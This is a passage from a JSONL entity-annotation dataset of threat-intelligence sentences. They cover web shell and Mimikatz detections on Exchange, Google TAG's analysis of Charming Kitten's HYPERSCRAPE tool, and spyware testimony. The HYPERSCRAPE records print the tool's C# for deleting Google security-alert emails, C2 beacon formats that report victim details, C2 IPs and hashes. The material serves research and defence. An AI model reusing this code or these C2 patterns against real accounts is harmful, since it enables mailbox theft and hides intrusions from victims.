severity.","entities":[{"id":50519,"label":"identity","start_offset":9,"end_offset":18},{"id":50520,"label":"vulnerability","start_offset":40,"end_offset":54},{"id":50521,"label":"TIME","start_offset":58,"end_offset":66}],"relations":[],"Comments":[]} {"id":4615,"text":" Fig - Microsoft Exchange Server Possible ASPX Web Shell The above model triggers when a new web shell is created.","entities":[{"id":50522,"label":"vulnerability","start_offset":11,"end_offset":60}],"relations":[],"Comments":[]} {"id":4616,"text":"You can see the path and name of the web shell.","entities":[{"id":50523,"label":"attack-pattern","start_offset":37,"end_offset":46}],"relations":[],"Comments":[]} {"id":4617,"text":"Fig - Potential Chopper Webshell Execution Fig - Identified Suspicious China Chopper Webshell Communication Fig - Possible Credential Dumping via Command Line ","entities":[{"id":50524,"label":"malware","start_offset":16,"end_offset":32},{"id":50525,"label":"malware","start_offset":76,"end_offset":98},{"id":50526,"label":"attack-pattern","start_offset":133,"end_offset":151}],"relations":[],"Comments":[]} {"id":4618,"text":"This model is triggered when an attacker fetches the credentials using a command-line from within the memory using Mimikatz.","entities":[{"id":50527,"label":"tools","start_offset":115,"end_offset":123}],"relations":[],"Comments":[]} {"id":4619,"text":"Since the web shell runs as the SYSTEM user, an attacker can fetch the NT LAN Manager (NTLM) hashes of the logged-in users, create or delete accounts, and perform extensive post-exploitation activities on the Exchange Server. Figure - Executing Mimikatz as SYSTEM using CC Fig - System Owner User Discovery The above event was triggered when we ran whoami from within the Chopper web shell.","entities":[{"id":50529,"label":"SOFTWARE","start_offset":209,"end_offset":224},{"id":50530,"label":"malware","start_offset":386,"end_offset":403},{"id":50531,"label":"tools","start_offset":250,"end_offset":258},{"id":50528,"label":"attack-pattern","start_offset":10,"end_offset":19}],"relations":[],"Comments":[]} {"id":4620,"text":"Since requests to the ASPX web shell are handled by the privileged w3wp.exe, an IIS Worker Process in the configured IIS application pool (Microsoft Exchange App pool) runs the commands in the context of NT Authority\\SYSTEM user.","entities":[{"id":50532,"label":"attack-pattern","start_offset":22,"end_offset":36},{"id":50533,"label":"FILEPATH","start_offset":67,"end_offset":75}],"relations":[],"Comments":[]} {"id":4621,"text":"RCA Diagrams: Fig. Executing commands using Chopper CnC Conclusion","entities":[],"relations":[],"Comments":[]} {"id":4622,"text":"There is no silver bullet when it comes to cybersecurity but using solutions that bake into your development pipeline to provide security as early as possible is better than scrambling for patches after deployment.","entities":[],"relations":[],"Comments":[]} {"id":4623,"text":"Quick and easy to deploy solutions like Trend Micro Cloud One and Trend Micro Vision One can provide you with SecOps-approved security from build-time to runtime without slowing you down.","entities":[{"id":50534,"label":"SOFTWARE","start_offset":40,"end_offset":61},{"id":50535,"label":"SOFTWARE","start_offset":66,"end_offset":88}],"relations":[],"Comments":[]} {"id":4624,"text":"Imagine that!","entities":[],"relations":[],"Comments":[]} {"id":4625,"text":" Tags Cloud | APT & Targeted Attacks | Expert Perspective | Exploits & Vulnerabilities | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} {"id":4626,"text":"As part of TAG's mission to counter serious threats to Google and our users, we've analyzed a range of persistent threats including APT35 and Charming Kitten, an Iranian government-backed group that regularly targets high risk users.","entities":[{"id":50537,"label":"identity","start_offset":55,"end_offset":61},{"id":50538,"label":"threat-actor","start_offset":132,"end_offset":137},{"id":50539,"label":"threat-actor","start_offset":142,"end_offset":157},{"id":50540,"label":"location","start_offset":162,"end_offset":169},{"id":50536,"label":"identity","start_offset":11,"end_offset":14}],"relations":[{"id":980,"from_id":50538,"to_id":50540,"type":"located-at"},{"id":981,"from_id":50539,"to_id":50540,"type":"located-at"}],"Comments":[]} {"id":4627,"text":"For years, we have been countering this group’s efforts to hijack accounts, deploy malware, and their use of novel techniques to conduct espionage aligned with the interests of the Iranian government.","entities":[{"id":50541,"label":"identity","start_offset":181,"end_offset":199}],"relations":[],"Comments":[]} {"id":4628,"text":"Now, we’re shining light on a new tool of theirs.","entities":[],"relations":[],"Comments":[]} {"id":4629,"text":"In December 2021, TAG discovered a novel Charming Kitten tool, named HYPERSCRAPE, used to steal user data from Gmail, Yahoo!, and Microsoft Outlook accounts.","entities":[{"id":50543,"label":"identity","start_offset":18,"end_offset":21},{"id":50544,"label":"threat-actor","start_offset":41,"end_offset":56},{"id":50545,"label":"malware","start_offset":69,"end_offset":80},{"id":50546,"label":"SOFTWARE","start_offset":111,"end_offset":116},{"id":50542,"label":"TIME","start_offset":3,"end_offset":16},{"id":50547,"label":"SOFTWARE","start_offset":118,"end_offset":124},{"id":50548,"label":"SOFTWARE","start_offset":130,"end_offset":147}],"relations":[{"id":982,"from_id":50545,"to_id":50544,"type":"authored-by"}],"Comments":[]} {"id":4630,"text":"The attacker runs HYPERSCRAPE on their own machine to download victims’ inboxes using previously acquired credentials.","entities":[{"id":50549,"label":"malware","start_offset":18,"end_offset":29}],"relations":[],"Comments":[]} {"id":4632,"text":"The oldest known sample is from 2020, and the tool is still under active development.","entities":[{"id":50551,"label":"TIME","start_offset":32,"end_offset":36}],"relations":[],"Comments":[]} {"id":4633,"text":"We have taken actions to re-secure these accounts and have notified the victims through our Government Backed Attacker Warnings.","entities":[],"relations":[],"Comments":[]} {"id":4634,"text":"This post will provide technical details about HYPERSCRAPE, similar to PWC’s recently published analysis on a Telegram grabber tool.","entities":[{"id":50552,"label":"malware","start_offset":47,"end_offset":58},{"id":50554,"label":"SOFTWARE","start_offset":110,"end_offset":118},{"id":50553,"label":"identity","start_offset":71,"end_offset":74}],"relations":[],"Comments":[]} {"id":4635,"text":"HYPERSCRAPE demonstrates Charming Kitten’s commitment to developing and maintaining purpose-built capabilities.","entities":[{"id":50555,"label":"malware","start_offset":0,"end_offset":11},{"id":14080,"label":"threat-actor","start_offset":25,"end_offset":40}],"relations":[],"Comments":[]} {"id":4636,"text":"Like much of their tooling, HYPERSCRAPE is not notable for its technical sophistication, but rather its effectiveness in accomplishing Charming Kitten’s objectives.","entities":[{"id":50556,"label":"malware","start_offset":28,"end_offset":39},{"id":14084,"label":"threat-actor","start_offset":135,"end_offset":150}],"relations":[],"Comments":[]} {"id":4637,"text":" HYPERSCRAPE requires the victim’s account credentials to run using a valid, authenticated user session the attacker has hijacked, or credentials the attacker has already acquired.","entities":[{"id":50557,"label":"malware","start_offset":1,"end_offset":12}],"relations":[],"Comments":[]} {"id":4638,"text":"It spoofs the user agent to look like an outdated browser, which enables the basic HTML view in Gmail.","entities":[{"id":50558,"label":"SOFTWARE","start_offset":96,"end_offset":101}],"relations":[],"Comments":[]} {"id":4639,"text":"Once logged in, the tool changes the account’s language settings to English and iterates through the contents of the mailbox, individually downloading messages as .eml files and marking them unread.","entities":[],"relations":[],"Comments":[]} {"id":4640,"text":"After the program has finished downloading the inbox, it reverts the language back to its original settings and deletes any security emails from Google.","entities":[{"id":50559,"label":"identity","start_offset":145,"end_offset":151}],"relations":[],"Comments":[]} {"id":4641,"text":"Earlier versions contained the option to request data from Google Takeout, a feature which allows users to export their data to a downloadable archive file.","entities":[{"id":50560,"label":"SOFTWARE","start_offset":59,"end_offset":73}],"relations":[],"Comments":[]} {"id":4642,"text":"The tool is written in .NET for Windows PCs and is designed to run on the attacker's machine.","entities":[{"id":50561,"label":"SOFTWARE","start_offset":32,"end_offset":39}],"relations":[],"Comments":[]} {"id":4643,"text":"We tested HYPERSCRAPE in a controlled environment with a test Gmail Account, although functionality may differ for Yahoo! and Microsoft accounts.","entities":[{"id":50562,"label":"malware","start_offset":10,"end_offset":21},{"id":50563,"label":"SOFTWARE","start_offset":62,"end_offset":67},{"id":50564,"label":"identity","start_offset":115,"end_offset":121},{"id":50565,"label":"identity","start_offset":126,"end_offset":135}],"relations":[],"Comments":[]} {"id":4644,"text":"HYPERSCRAPE won't run unless in a directory with other file dependencies.","entities":[{"id":50566,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":4645,"text":"When launched, the tool makes an HTTP GET request to a C2 to check for a response body of \"OK'' and will terminate if it's not found.","entities":[],"relations":[],"Comments":[]} {"id":4646,"text":"In the version tested, the C2 was unobfuscated and stored as a hardcoded string.","entities":[],"relations":[],"Comments":[]} {"id":4647,"text":"In later versions it was obfuscated with Base64.","entities":[],"relations":[],"Comments":[]} {"id":4648,"text":"GET http:\/\/{C2}\/Index.php?Ck=OK HTTP\/1.1","entities":[{"id":50567,"label":"URL","start_offset":4,"end_offset":31}],"relations":[],"Comments":[]} {"id":4649,"text":"Host: {C2}","entities":[],"relations":[],"Comments":[]} {"id":4650,"text":"Accept-Encoding: gzip Connection: Keep-Alive","entities":[],"relations":[],"Comments":[]} {"id":4651,"text":"The tool accepts arguments from the command line such as the mode of operation, an identifier string, and a path string to a valid cookie file.","entities":[],"relations":[],"Comments":[]} {"id":4652,"text":"A new form is displayed if the information is not provided via command prompt.","entities":[],"relations":[],"Comments":[]} {"id":4653,"text":"Once provided, the data in the \"Identity\" field is sent to a C2 for confirmation.","entities":[],"relations":[],"Comments":[]} {"id":4654,"text":"Again, the response is expected to be \"OK\".","entities":[],"relations":[],"Comments":[]} {"id":4655,"text":"GET http:\/\/{C2}\/Index.php?vubc={identity} HTTP\/1.1","entities":[{"id":14119,"label":"URL","start_offset":4,"end_offset":40}],"relations":[],"Comments":[]} {"id":4656,"text":"Host: {C2} Accept-Encoding: gzip","entities":[],"relations":[],"Comments":[]} {"id":4657,"text":"If the cookie file path was not supplied via the command line, a new form will allow the operator to do so using drag and drop.","entities":[],"relations":[],"Comments":[]} {"id":4658,"text":"After parsing, the cookies are inserted into a local cache used by the embedded web browser.","entities":[],"relations":[],"Comments":[]} {"id":4659,"text":"A new folder named \"Download\" is created adjacent to the main binary.","entities":[],"relations":[],"Comments":[]} {"id":4660,"text":"The browser then navigates to Gmail to begin the data collection.","entities":[{"id":50568,"label":"SOFTWARE","start_offset":30,"end_offset":35}],"relations":[],"Comments":[]} {"id":4661,"text":"The user agent is spoofed so it appears like an outdated browser, which results in an error message and allows the attacker to enable the basic HTML view in Gmail.","entities":[{"id":50569,"label":"SOFTWARE","start_offset":157,"end_offset":162}],"relations":[],"Comments":[]} {"id":4662,"text":"If the cookies failed to provide access to the account, a login page is displayed and the attacker can manually enter credentials to proceed, as the program will wait until it finds the inbox page.","entities":[],"relations":[],"Comments":[]} {"id":4663,"text":"Once the attacker has logged in to the victim’s account, HYPERSCRAPE checks to see if the language is set to English, changing it if not.","entities":[{"id":50570,"label":"malware","start_offset":57,"end_offset":68}],"relations":[],"Comments":[]} {"id":4664,"text":"The language is returned to its original setting when the run is finished.","entities":[],"relations":[],"Comments":[]} {"id":4665,"text":"HYPERSCRAPE then begins iterating through all available tabs in the inbox looking for emails to download.","entities":[{"id":50571,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":4666,"text":"It does the following for each email found: The emails are saved with \".eml\" extensions under the Downloads directory with the filename corresponding to the subject.","entities":[],"relations":[],"Comments":[]} {"id":4667,"text":"A log file is written containing a count of the emails that were downloaded.","entities":[],"relations":[],"Comments":[]} {"id":4668,"text":"When finished, a HTTP POST request is made to the C2 to relay the status and system information.","entities":[],"relations":[],"Comments":[]} {"id":4669,"text":"The downloaded emails are not sent to the C2.","entities":[],"relations":[],"Comments":[]} {"id":4670,"text":"POST http:\/\/{C2}\/?Key={GUID}&Crc={Identifier} { \"appName\": \"Gmail Downloader\", \"targetname\": \"{Email}\", \"HostName\": \"REDACTED\", \"srcUserIP\": \"REDACTED\", \"actionType\": \"First\", \"timeOccurrence\": \"05\/01\/2022 05:50:31 PM\", \"OS\": \"REDACTED\", \"OSVersion\": \"REDACTED\", \"SystemModel\": \"REDACTED\", \"SystemType\": \"REDACTED\", \"srcName\": \"REDACTED\", \"srcOrgName\": \"REDACTED\" }","entities":[{"id":50573,"label":"TIME","start_offset":195,"end_offset":217},{"id":14144,"label":"URL","start_offset":5,"end_offset":44}],"relations":[],"Comments":[]} {"id":4671,"text":"The program will delete any security emails from Google generated by the attacker’s activity.","entities":[{"id":50574,"label":"identity","start_offset":49,"end_offset":55}],"relations":[],"Comments":[]} {"id":4672,"text":"private bool IsThereAnyEMail() { List < GeckoHtmlElement > list = (from x in this.geckoWebBrowser.Document.GetElementsByTagName(\"span\") where x.TextContent.StartsWith (\"Security alert\") || x.TextContent.StartsWith(\"Archive of Google data requested\") || x.TextContent.StartsWith(\"Your Google data archive is ready\") || x.TextContent.StartsWith(\"Your Google data is ready\") || x.TextContent.StartsWith(\"Critical security alert\") ||","entities":[],"relations":[],"Comments":[]} {"id":4673,"text":"x.TextContent.StartsWith(\"Access for less secure apps has been turned on\") ||","entities":[],"relations":[],"Comments":[]} {"id":4674,"text":"x.TextContent.StartsWith(\"Review blocked sign-in attempt\") || x.TextContent.","entities":[],"relations":[],"Comments":[]} {"id":4675,"text":"StartsWith(\"Help us protect you: Security advice from Google\")","entities":[],"relations":[],"Comments":[]} {"id":4676,"text":"x.TextContent.StartsWith(\"Access for less secure apps has been turned on\") select x).ToList","entities":[],"relations":[],"Comments":[]} {"id":4677,"text":"GeckoHtmlElement > (","entities":[],"relations":[],"Comments":[]} {"id":4678,"text":"; bool flag = list.Count == 0; return !flag; }","entities":[],"relations":[],"Comments":[]} {"id":4679,"text":"Data from Google Takeout is also available upon request, but the option was only found in early builds.","entities":[{"id":50575,"label":"SOFTWARE","start_offset":10,"end_offset":24}],"relations":[],"Comments":[]} {"id":4680,"text":"The functionality was not automated and it's unclear why it was removed in later versions.","entities":[],"relations":[],"Comments":[]} {"id":4681,"text":"When conducting a Takeout, the program will spawn a new copy of itself and initialize a pipe communication channel to relay the cookies and account name, both of which are required to accomplish the Takeout.","entities":[],"relations":[],"Comments":[]} {"id":4682,"text":"When they are received, the browser navigates to the official Takeout link to request and eventually download the exported data.","entities":[],"relations":[],"Comments":[]} {"id":4683,"text":"public void ManageTakeOut() { string text = \"PipeName\";","entities":[],"relations":[],"Comments":[]} {"id":4684,"text":"Process process = new Process(); process.StartInfo.Arguments = string.Format(\"PIPE Google \\\"{0}\\\"\", text); process.StartInfo.FileName = Process.GetCurrentProcess().MainModule.FileName; process.Start();","entities":[],"relations":[],"Comments":[]} {"id":4685,"text":"PipeCommunication pipeCommunication = new PipeCommunication(true, text); bool flag = false; while (!flag)","entities":[],"relations":[],"Comments":[]} {"id":4686,"text":"{ try { JsonInfo jsonInfo = pipeCommunication.Read(); switch (jsonInfo.Type) { case JsonType.GetCookies: jsonInfo.Data = this.CookieText; pipeCommunication.Write(jsonInfo); break; case JsonType.TakeOutFile: flag = true; break; case JsonType.GetUsername: while (this.OperationObject.GetUsername() == null) { Thread.Sleep(1000); }","entities":[],"relations":[],"Comments":[]} {"id":4687,"text":"jsonInfo.Data = this.OperationObject.GetUsername(); pipeCommunication.Write(jsonInfo); break; } }","entities":[],"relations":[],"Comments":[]} {"id":4688,"text":"catch (Exception) { bool hasExited = process.HasExited; if (hasExited) { flag = true; } }","entities":[],"relations":[],"Comments":[]} {"id":4689,"text":"pipeCommunication.Close(); }","entities":[],"relations":[],"Comments":[]} {"id":4690,"text":"TAG is committed to sharing research to raise awareness on bad actors like Charming Kitten within the security community, and for companies and individuals that may be targeted.","entities":[{"id":50576,"label":"identity","start_offset":0,"end_offset":3},{"id":50577,"label":"threat-actor","start_offset":75,"end_offset":90}],"relations":[],"Comments":[]} {"id":4691,"text":"It’s why we do things like work with our CyberCrime Investigation Group to share critical information relevant to law enforcement.","entities":[],"relations":[],"Comments":[]} {"id":4692,"text":"We hope doing so will improve understanding of tactics and techniques that will enhance threat hunting capabilities and lead to stronger protections across the industry.","entities":[],"relations":[],"Comments":[]} {"id":4693,"text":"We’ll also continue to apply those findings internally to improve the safety and security of our products so we can effectively combat threats and protect users who rely on our services.","entities":[],"relations":[],"Comments":[]} {"id":4694,"text":"In the meantime, we encourage high risk users to enroll in our Advanced Protection Program (APP) and utilize Google Account Level Enhanced Safe Browsing to ensure they have the greatest level of protection in the face of ongoing threats.","entities":[],"relations":[],"Comments":[]} {"id":4695,"text":"C2s 136.243.108.14 173.209.51.54 HYPERSCRAPE binaries","entities":[{"id":50578,"label":"malware","start_offset":33,"end_offset":44},{"id":14210,"label":"IPV4","start_offset":4,"end_offset":18},{"id":14211,"label":"IPV4","start_offset":19,"end_offset":32}],"relations":[],"Comments":[]} {"id":4696,"text":"03d0e7ad4c12273a42e4c95d854408b98b0cf5ecf5f8c5ce05b24729b6f4e369 35a485972282b7e0e8e3a7a9cbf86ad93856378fd96cc8e230be5099c4b89208 5afc59cd2b39f988733eba427c8cf6e48bd2e9dc3d48a4db550655efe0dca798 6dc0600de00ba6574488472d5c48aa2a7b23a74ff1378d8aee6a93ea0ee7364f 767bd025c8e7d36f64dbd636ce0f29e873d1e3ca415d5ad49053a68918fe89f4 977f0053690684eb509da27d5eec2a560311c084a4a133191ef387e110e8b85f ac8e59e8abeacf0885b451833726be3e8e2d9c88d21f27b16ebe00f00c1409e6 cd2ba296828660ecd07a36e8931b851dda0802069ed926b3161745aae9aa6daa Microsoft Live DLL 1a831a79a932edd0398f46336712eff90ebb5164a189ef38c4dacc64ba84fe23 PDB E:\\Working\\Projects\\EmailDownloader\\EmailDownloaderCookieMode\\EmailDownloader\\obj\\Debug\\EmailDownloader.pdb E:\\Working\\Projects\\EmailDownloader\\EmailDownloaderCookieMode\\Mahdi\\LiveLib\\obj\\Release\\LiveLib.pdb","entities":[{"id":50579,"label":"FILEPATH","start_offset":608,"end_offset":715},{"id":50580,"label":"FILEPATH","start_offset":716,"end_offset":815},{"id":14212,"label":"SHA2","start_offset":0,"end_offset":64},{"id":14216,"label":"SHA2","start_offset":260,"end_offset":324},{"id":14217,"label":"SHA2","start_offset":325,"end_offset":389},{"id":14218,"label":"SHA2","start_offset":390,"end_offset":454},{"id":14219,"label":"SHA2","start_offset":455,"end_offset":519},{"id":14220,"label":"identity","start_offset":520,"end_offset":529},{"id":14213,"label":"SHA2","start_offset":65,"end_offset":129},{"id":14214,"label":"SHA2","start_offset":130,"end_offset":194},{"id":14215,"label":"SHA2","start_offset":195,"end_offset":259},{"id":14221,"label":"SHA2","start_offset":539,"end_offset":603}],"relations":[],"Comments":[]} {"id":4697,"text":"This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q2 2022.","entities":[{"id":50581,"label":"TIME","start_offset":96,"end_offset":103}],"relations":[],"Comments":[]} {"id":4698,"text":"It was last updated on July 29, 2022.","entities":[{"id":50582,"label":"TIME","start_offset":23,"end_offset":36}],"relations":[],"Comments":[]} {"id":4699,"text":" The following testimony was delivered to the U.S. House Intelligence Committee by Shane Huntley, Senior Director of Google’s Threat Analysis Group (TAG) on July 27, 2022. Chairman Schiff, Ranking Member Turner, and esteemed Members of the Committee: Thank you for the opportunity to appear before the Committee to discuss Google’s efforts to protect users from commercial spyware.","entities":[{"id":50584,"label":"identity","start_offset":83,"end_offset":96},{"id":50585,"label":"TIME","start_offset":157,"end_offset":170},{"id":50587,"label":"identity","start_offset":324,"end_offset":330},{"id":50583,"label":"identity","start_offset":46,"end_offset":79},{"id":50586,"label":"identity","start_offset":173,"end_offset":188},{"id":50588,"label":"identity","start_offset":98,"end_offset":153}],"relations":[],"Comments":[]} {"id":4700,"text":"We appreciate the Committee’s efforts to raise awareness about the commercial spyware industry that is thriving and growing, creating risks to Americans and Internet users across the globe.","entities":[],"relations":[],"Comments":[]} {"id":4701,"text":" Google has been tracking the activities of commercial spyware vendors for years, and we have been taking critical steps to protect our users.","entities":[{"id":50589,"label":"identity","start_offset":1,"end_offset":7}],"relations":[],"Comments":[]} {"id":4702,"text":"We take the security of our users very seriously, and we have dedicated teams in place to protect against attacks from a wide range of sources.","entities":[],"relations":[],"Comments":[]} {"id":4703,"text":"Our Threat Analysis Group, or TAG, is dedicated to protecting users from threats posed by state-sponsored malware attacks and other advanced persistent threats.","entities":[{"id":50590,"label":"identity","start_offset":4,"end_offset":25},{"id":50591,"label":"identity","start_offset":30,"end_offset":33}],"relations":[],"Comments":[]} {"id":4704,"text":"TAG actively monitors threat actors and the evolution of their tactics and techniques.","entities":[{"id":50592,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":4705,"text":"For example, TAG has been closely tracking and disrupting campaigns targeting individuals and organizations in Ukraine, and frequently publishes reports on Russian threat actors.","entities":[{"id":50593,"label":"identity","start_offset":13,"end_offset":16},{"id":50594,"label":"location","start_offset":111,"end_offset":118},{"id":50595,"label":"location","start_offset":156,"end_offset":163}],"relations":[],"Comments":[]} {"id":4706,"text":"We use our research to continuously improve the safety and security of our products and share this intelligence with our industry peers.","entities":[],"relations":[],"Comments":[]} {"id":4707,"text":"We also publicly release information about the operations we disrupt, which is available to our government partners and the general public.","entities":[],"relations":[],"Comments":[]} {"id":4708,"text":"TAG tracks and proactively counters serious state-sponsored and financially motivated information cyber criminal activities, such as hacking and the use of spyware.","entities":[{"id":50596,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":4709,"text":"And we don’t just plug security holes – we work to eliminate entire classes of threats for consumers and businesses whose work depends on the Internet.","entities":[],"relations":[],"Comments":[]} {"id":4710,"text":"We are joined in this effort by many other security teams at Google, including Project Zero, our team of security researchers at Google who study zero-day vulnerabilities in the hardware and software systems that are depended upon by users around the world.","entities":[{"id":50597,"label":"identity","start_offset":61,"end_offset":67},{"id":50598,"label":"identity","start_offset":79,"end_offset":91},{"id":50599,"label":"identity","start_offset":129,"end_offset":135}],"relations":[],"Comments":[]} {"id":4711,"text":" Google has a long track record combating commercial surveillance tools targeting our users.","entities":[{"id":50600,"label":"identity","start_offset":1,"end_offset":7}],"relations":[],"Comments":[]} {"id":4712,"text":"In 2017, Android – which is owned by Google – was the first mobile platform to warn users about NSO Group’s Pegasus spyware.","entities":[{"id":50601,"label":"TIME","start_offset":3,"end_offset":7},{"id":50602,"label":"SOFTWARE","start_offset":9,"end_offset":16},{"id":50603,"label":"identity","start_offset":37,"end_offset":43},{"id":50604,"label":"threat-actor","start_offset":96,"end_offset":105},{"id":50605,"label":"malware","start_offset":108,"end_offset":115}],"relations":[],"Comments":[]} {"id":4713,"text":"At the time, our Android team released research about a newly discovered family of spyware related to Pegasus that was used in a targeted attack on a small number of Android devices.","entities":[{"id":50607,"label":"malware","start_offset":102,"end_offset":109},{"id":50608,"label":"SOFTWARE","start_offset":166,"end_offset":173},{"id":50606,"label":"SOFTWARE","start_offset":17,"end_offset":24}],"relations":[],"Comments":[]} {"id":4714,"text":"We observed fewer than three dozen installs of this spyware.","entities":[],"relations":[],"Comments":[]} {"id":4715,"text":"We remediated the compromises for these users and implemented controls to protect all Android users.","entities":[{"id":50609,"label":"SOFTWARE","start_offset":86,"end_offset":93}],"relations":[],"Comments":[]} {"id":4716,"text":"NSO Group continues to pose risks across the Internet ecosystem.","entities":[{"id":50610,"label":"threat-actor","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":4717,"text":"In 2019, we confronted the risks posed by NSO Group again, relying upon NSO Groups’s marketing information suggesting that they had a 0-day exploit for Android.","entities":[{"id":50611,"label":"TIME","start_offset":3,"end_offset":7},{"id":50612,"label":"threat-actor","start_offset":42,"end_offset":51},{"id":50614,"label":"SOFTWARE","start_offset":152,"end_offset":159},{"id":50613,"label":"threat-actor","start_offset":72,"end_offset":82},{"id":50615,"label":"attack-pattern","start_offset":134,"end_offset":147}],"relations":[],"Comments":[]} {"id":4718,"text":"Google was able to identify the vulnerability in use and fix the exploit quickly.","entities":[{"id":50616,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":4719,"text":"In December 2021, we released research about novel techniques used by NSO Group to compromise iMessage users.","entities":[{"id":50617,"label":"TIME","start_offset":3,"end_offset":16},{"id":50618,"label":"threat-actor","start_offset":70,"end_offset":79},{"id":50619,"label":"SOFTWARE","start_offset":94,"end_offset":102}],"relations":[],"Comments":[]} {"id":4720,"text":"iPhone users could be compromised by receiving a malicious iMessage text, without ever needing to click a malicious link.","entities":[{"id":50620,"label":"SOFTWARE","start_offset":59,"end_offset":67}],"relations":[],"Comments":[]} {"id":4721,"text":"Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense.","entities":[],"relations":[],"Comments":[]} {"id":4722,"text":"Based on our research and findings, we assessed this to be one of the most technically sophisticated exploits we had ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.","entities":[{"id":50621,"label":"threat-actor","start_offset":172,"end_offset":175}],"relations":[],"Comments":[]} {"id":4723,"text":"Although this Committee must be concerned with the exploits of NSO Group, it is not the only entity posing risks to our users.","entities":[{"id":50622,"label":"threat-actor","start_offset":63,"end_offset":72}],"relations":[],"Comments":[]} {"id":4724,"text":"For example, TAG discovered campaigns targeting Armenian users which utilized zero-day vulnerabilities in Chrome and Internet Explorer.","entities":[{"id":50623,"label":"threat-actor","start_offset":13,"end_offset":16},{"id":50624,"label":"location","start_offset":48,"end_offset":56},{"id":50625,"label":"attack-pattern","start_offset":78,"end_offset":102},{"id":50626,"label":"SOFTWARE","start_offset":106,"end_offset":112},{"id":50627,"label":"SOFTWARE","start_offset":117,"end_offset":134}],"relations":[],"Comments":[]} {"id":4725,"text":"We assessed that a surveillance vendor packaged and sold these technologies.","entities":[],"relations":[],"Comments":[]} {"id":4726,"text":"Reporting by CitizenLab linked this activity to Candiru, an Israeli spyware vendor.","entities":[{"id":50628,"label":"identity","start_offset":13,"end_offset":23},{"id":50629,"label":"threat-actor","start_offset":48,"end_offset":55},{"id":50630,"label":"identity","start_offset":60,"end_offset":82}],"relations":[],"Comments":[]} {"id":4727,"text":"Other reporting from Microsoft has linked this spyware to the compromise of dozens of victims, including political dissidents, human rights activists, journalists, and academics.","entities":[{"id":50631,"label":"identity","start_offset":21,"end_offset":30}],"relations":[],"Comments":[]} {"id":4728,"text":"Most recently, we reported in May on five zero-day vulnerabilities affecting Chrome and Android which were used to compromise Android users.","entities":[{"id":50632,"label":"SOFTWARE","start_offset":77,"end_offset":83},{"id":50633,"label":"SOFTWARE","start_offset":88,"end_offset":95},{"id":50634,"label":"SOFTWARE","start_offset":126,"end_offset":133},{"id":50635,"label":"vulnerability","start_offset":37,"end_offset":66}],"relations":[{"id":983,"from_id":50632,"to_id":50635,"type":"has"},{"id":984,"from_id":50633,"to_id":50635,"type":"has"},{"id":985,"from_id":50634,"to_id":50635,"type":"has"}],"Comments":[]} {"id":4729,"text":"We assess with high confidence that commercial surveillance company Cytrox packaged these vulnerabilities, and sold the hacking software to at least eight governments.","entities":[{"id":50636,"label":"identity","start_offset":68,"end_offset":74}],"relations":[],"Comments":[]} {"id":4730,"text":"Among other targets, this spyware was used to compromise journalists and opposition politicians.","entities":[],"relations":[],"Comments":[]} {"id":4731,"text":"Our reporting is consistent with earlier analysis produced by CitizenLab and Meta.","entities":[{"id":50637,"label":"identity","start_offset":62,"end_offset":72},{"id":50638,"label":"identity","start_offset":77,"end_offset":81}],"relations":[],"Comments":[]} {"id":4732,"text":"TAG also recently released information on a segment of attackers we call “hack-for-hire” that focuses on compromising accounts and exfiltrating data as a service.","entities":[{"id":50640,"label":"attack-pattern","start_offset":74,"end_offset":87},{"id":50641,"label":"attack-pattern","start_offset":131,"end_offset":161},{"id":50639,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":4733,"text":"In contrast to commercial surveillance vendors, who we generally observe selling a capability for the end user to operate, hack-for-hire firms conduct attacks themselves.","entities":[{"id":50642,"label":"attack-pattern","start_offset":123,"end_offset":136}],"relations":[],"Comments":[]} {"id":4734,"text":"They target a wide range of users and opportunistically take advantage of known security flaws when undertaking their campaigns.","entities":[],"relations":[],"Comments":[]} {"id":4735,"text":"In June, we provided examples of the hack-for-hire ecosystem from India, Russia, and the United Arab Emirates.","entities":[{"id":50647,"label":"location","start_offset":89,"end_offset":109},{"id":50643,"label":"TIME","start_offset":3,"end_offset":7},{"id":50644,"label":"attack-pattern","start_offset":37,"end_offset":50},{"id":50645,"label":"location","start_offset":66,"end_offset":71},{"id":50646,"label":"location","start_offset":73,"end_offset":79}],"relations":[],"Comments":[]} {"id":4736,"text":"The growth of commercial spyware vendors and hack-for-hire groups has necessitated growth in TAG to counter these threats.","entities":[{"id":50648,"label":"identity","start_offset":93,"end_offset":96}],"relations":[],"Comments":[]} {"id":4737,"text":"Where once we only needed substreams to focus on threat actors such as China, Russia, and North Korea, TAG now has a dedicated analysis subteam dedicated to commercial vendors and operators.","entities":[{"id":50649,"label":"location","start_offset":71,"end_offset":76},{"id":50650,"label":"location","start_offset":78,"end_offset":84},{"id":50651,"label":"location","start_offset":90,"end_offset":101},{"id":50652,"label":"identity","start_offset":103,"end_offset":106}],"relations":[],"Comments":[]} {"id":4738,"text":" Our findings underscore the extent to which commercial surveillance vendors have proliferated capabilities historically only used by governments.","entities":[],"relations":[],"Comments":[]} {"id":4739,"text":"These vendors operate with deep technical expertise to develop and operationalize exploits.","entities":[],"relations":[],"Comments":[]} {"id":4740,"text":"We believe its use is growing, fueled by demand from governments.","entities":[],"relations":[],"Comments":[]} {"id":4741,"text":"Seven of the nine zero-day vulnerabilities our Threat Analysis Group discovered in 2021 were originally developed by commercial providers and sold to and used by state-sponsored actors.","entities":[{"id":50653,"label":"identity","start_offset":47,"end_offset":68},{"id":50654,"label":"TIME","start_offset":83,"end_offset":87}],"relations":[],"Comments":[]} {"id":4742,"text":"TAG is actively tracking more than 30 vendors with varying levels of sophistication and public exposure selling exploits or surveillance capabilities to state-sponsored actors.","entities":[{"id":50655,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":4743,"text":"This industry appears to be thriving.","entities":[],"relations":[],"Comments":[]} {"id":4746,"text":"These vendors are enabling the proliferation of dangerous hacking tools, arming nation state actors that would 